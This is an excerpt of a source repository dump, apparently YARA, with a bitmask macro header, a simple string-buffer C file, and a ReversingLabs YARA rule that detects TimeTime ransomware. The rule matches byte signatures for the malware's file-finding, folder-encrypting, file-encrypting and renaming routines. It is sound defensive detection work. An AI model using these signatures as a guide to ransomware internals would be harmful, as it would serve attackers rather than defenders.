to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #ifndef YR_BITMASK_H 31 | #define YR_BITMASK_H 32 | 33 | #include 34 | 35 | // 36 | // Utility macros for working with bitmaps. 37 | // 38 | // Declare a bitmask of n bits: 39 | // YR_BITMASK my_bitmask[YR_BITMASK_SIZE(n)]; 40 | // 41 | // Clear all bits: 42 | // yr_bitmask_clear_all(my_bitmask) 43 | // 44 | // Set bit n to 1: 45 | // yr_bitmask_set(my_bitmask, n) 46 | // 47 | // Clear bit n (set to 0): 48 | // yr_bitmask_clear(my_bitmask, n) 49 | // 50 | // Check if bit n is set: 51 | // yr_bitmask_is_set(my_bitmask, n) 52 | // 53 | 54 | #define YR_BITMASK unsigned long 55 | 56 | #define YR_BITMASK_SLOT_BITS (sizeof(YR_BITMASK) * 8) 57 | #define YR_BITMASK_SIZE(n) (((n) / (YR_BITMASK_SLOT_BITS)) + 1) 58 | 59 | #define yr_bitmask_set(bm, i) \ 60 | do \ 61 | { \ 62 | (bm)[(i) / YR_BITMASK_SLOT_BITS] |= 1UL << ((i) % YR_BITMASK_SLOT_BITS); \ 63 | } while (0) 64 | 65 | #define yr_bitmask_clear(bm, i) \ 66 | do \ 67 | { \ 68 | (bm)[(i) / YR_BITMASK_SLOT_BITS] &= ~( \ 69 | 1UL << ((i) % YR_BITMASK_SLOT_BITS)); \ 70 | } while (0) 71 | 72 | #define yr_bitmask_clear_all(bm) memset(bm, 0, sizeof(bm)) 73 | 74 | #define yr_bitmask_is_set(bm, i) \ 75 | ((bm)[(i) / YR_BITMASK_SLOT_BITS] & (1UL << ((i) % YR_BITMASK_SLOT_BITS))) 76 | 77 | #define yr_bitmask_is_not_set(bm, i) (!yr_bitmask_is_set(bm, i)) 78 | 79 | #define yr_bitmask_print(bm) \ 80 | { \ 81 | int i; \ 82 | for (i = 0; i < sizeof(bm) / sizeof(bm[0]); i++) \ 83 | { \ 84 | printf("%016lX\n", bm[i]); \ 85 | } \ 86 | } 87 | 88 | uint32_t yr_bitmask_find_non_colliding_offset( 89 | YR_BITMASK* a, 90 | YR_BITMASK* b, 91 | uint32_t len_a, 92 | uint32_t len_b, 93 | uint32_t* off_a); 94 | 95 | #endif 96 | -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.TimeTime.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_TimeTime : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "TIMETIME" 12 | description = "Yara rule that detects TimeTime ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "TimeTime" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $rename_files = { 21 | 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 12 ?? 28 ?? ?? ?? ?? 0B 00 07 28 ?? ?? ?? 22 | ?? 16 FE 01 0C 08 2C ?? 2B ?? 00 00 07 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 23 | 00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 24 | 6F ?? ?? ?? ?? 00 DC 2A 25 | } 26 | 27 | $find_files = { 28 | 00 73 ?? ?? ?? ?? 0A 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 07 2C ?? 06 0C DD ?? ?? ?? 29 | ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 30 | 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 31 | 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C 32 | ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? 33 | ?? ?? ?? 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 34 | ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DD ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 6F 35 | ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 06 0C DE ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 36 | ?? 11 ?? 9A 13 ?? 00 06 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 37 | 32 ?? 00 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13 ?? 00 06 11 ?? 28 ?? 38 | ?? ?? ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ?? 13 ?? 39 | 00 00 DE ?? 06 0C 2B ?? 08 2A 40 | } 41 | 42 | $encrypt_folder = { 43 | 00 02 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C 44 | 00 00 08 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 01 0D 09 2C ?? 00 16 13 ?? 16 13 ?? 08 73 45 | ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 08 19 46 | 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 00 DE ?? 47 | 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 11 ?? 16 FE 01 11 ?? 5F 11 ?? 5F 13 ?? 11 ?? 2C 48 | ?? 00 08 28 ?? ?? ?? ?? 00 00 00 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ?? 49 | ?? ?? ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A 50 | } 51 | 52 | $encrypt_files = { 53 | 00 02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 2C ?? 38 ?? ?? ?? ?? 02 7E ?? ?? ?? ?? 6F ?? 54 | ?? ?? ?? 0D 09 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 0A 06 8E 69 8D ?? ?? ?? ?? 0B 16 13 ?? 2B 55 | ?? 00 06 11 ?? 91 13 ?? 11 ?? 17 58 D1 13 ?? 11 ?? D2 13 ?? 07 11 ?? 11 ?? 9C 00 11 ?? 56 | 17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 02 07 28 ?? ?? ?? ?? 00 02 02 7E ?? 57 | ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 02 28 ?? ?? ?? ?? 00 7E 58 | ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 00 2A 59 | } 60 | 61 | condition: 62 | uint16(0) == 0x5A4D and 63 | ( 64 | $find_files 65 | ) and 66 | ( 67 | $encrypt_files 68 | ) and 69 | ( 70 | $encrypt_folder 71 | ) and 72 | ( 73 | $rename_files 74 | ) 75 | } -------------------------------------------------------------------------------- /src/lib/simple_str.c: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2022. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | */ 29 | 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | 36 | static bool sstr_vappendf(SIMPLE_STR* ss, const char* fmt, va_list va) 37 | { 38 | // Create copy because list will get consumed when getting the final length 39 | va_list va2; 40 | va_copy(va2, va); 41 | 42 | int size = vsnprintf(NULL, 0, fmt, va2); 43 | 44 | va_end(va2); 45 | 46 | if (size < 0) 47 | return false; 48 | 49 | if (ss->cap < ss->len + size + 1) 50 | { 51 | uint32_t new_size = (ss->len + size) * 2 + 64; 52 | char* tmp = yr_realloc(ss->str, new_size); 53 | 54 | if (!tmp) 55 | return false; 56 | 57 | ss->str = tmp; 58 | ss->cap = new_size; 59 | } 60 | 61 | ss->len += vsnprintf(ss->str + ss->len, ss->cap, fmt, va); 62 | 63 | return true; 64 | } 65 | 66 | SIMPLE_STR* sstr_new(const char* s) 67 | { 68 | SIMPLE_STR* ss = yr_calloc(1, sizeof(SIMPLE_STR)); 69 | if (!ss) 70 | return NULL; 71 | 72 | if (s) 73 | { 74 | uint32_t slen = strlen(s); 75 | ss->str = yr_malloc(slen + 1); 76 | if (!ss->str) 77 | { 78 | yr_free(ss); 79 | return NULL; 80 | } 81 | ss->len = slen; 82 | ss->cap = slen; 83 | memcpy(ss->str, s, slen + 1); 84 | } 85 | 86 | return ss; 87 | } 88 | 89 | SIMPLE_STR* sstr_newf(const char* fmt, ...) 90 | { 91 | SIMPLE_STR* ss = sstr_new(NULL); 92 | if (!ss) 93 | return NULL; 94 | 95 | va_list va; 96 | va_start(va, fmt); 97 | bool ret = sstr_vappendf(ss, fmt, va); 98 | va_end(va); 99 | 100 | if (ret) 101 | return ss; 102 | 103 | sstr_free(ss); 104 | 105 | return NULL; 106 | } 107 | 108 | void sstr_free(SIMPLE_STR* ss) 109 | { 110 | if (ss) 111 | { 112 | yr_free(ss->str); 113 | yr_free(ss); 114 | } 115 | } 116 | 117 | bool sstr_appendf(SIMPLE_STR* ss, const char* fmt, ...) 118 | { 119 | va_list vlist; 120 | va_start(vlist, fmt); 121 | bool ret = sstr_vappendf(ss, fmt, vlist); 122 | va_end(vlist); 123 | 124 | return ret; 125 | } 126 | 127 | char* sstr_move(SIMPLE_STR* ss) 128 | { 129 | char* ret = ss->str; 130 | ss->str = NULL; 131 | ss->len = 0; 132 | ss->cap = 0; 133 | 134 | return ret; 135 | } 136 | --------------------------------------------------------------------------------